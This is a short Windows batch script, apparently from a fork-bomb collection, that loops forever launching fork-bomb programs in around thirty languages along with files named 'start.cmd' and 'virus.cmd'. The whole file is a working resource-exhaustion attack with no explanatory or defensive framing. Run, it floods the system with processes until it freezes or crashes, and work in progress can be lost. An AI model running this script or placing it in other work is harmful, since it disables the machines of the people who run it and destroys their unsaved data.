@ECHO OFF
:START
start fork-bomb.html
start fork-bomb.adb
start fork-bomb.awk
start fork-bomb.bash
start fork-bomb.bat
start fork-bomb.bf
start fork-bomb.c
start fork-bomb.cc
start fork-bomb.cs
start fork-bomb.erl
start fork-bomb.fasm
start fork-bomb.fasm
start fork-bomb.go
start fork-bomb.hs
start forkbomb.java
start fork-bomb.js
start fork-bomb.lsp
start fork-bomb.lua
start fork-bomb.mdp
start fork-bomb.nim
start fork-bomb.php
start fork-bomb.pl
start fork-bomb.ps1
start fork-bomb.py
start fork-bomb.r
start fork-bomb.rb
start fork-bomb.rs
start fork-bomb.s
start fork-bomb.scm
start fork-bomb.sh
start fork-bomb.vbs
start fork-bomb-netcore.cs
start start.cmd
start virus.cmd
GOTO START
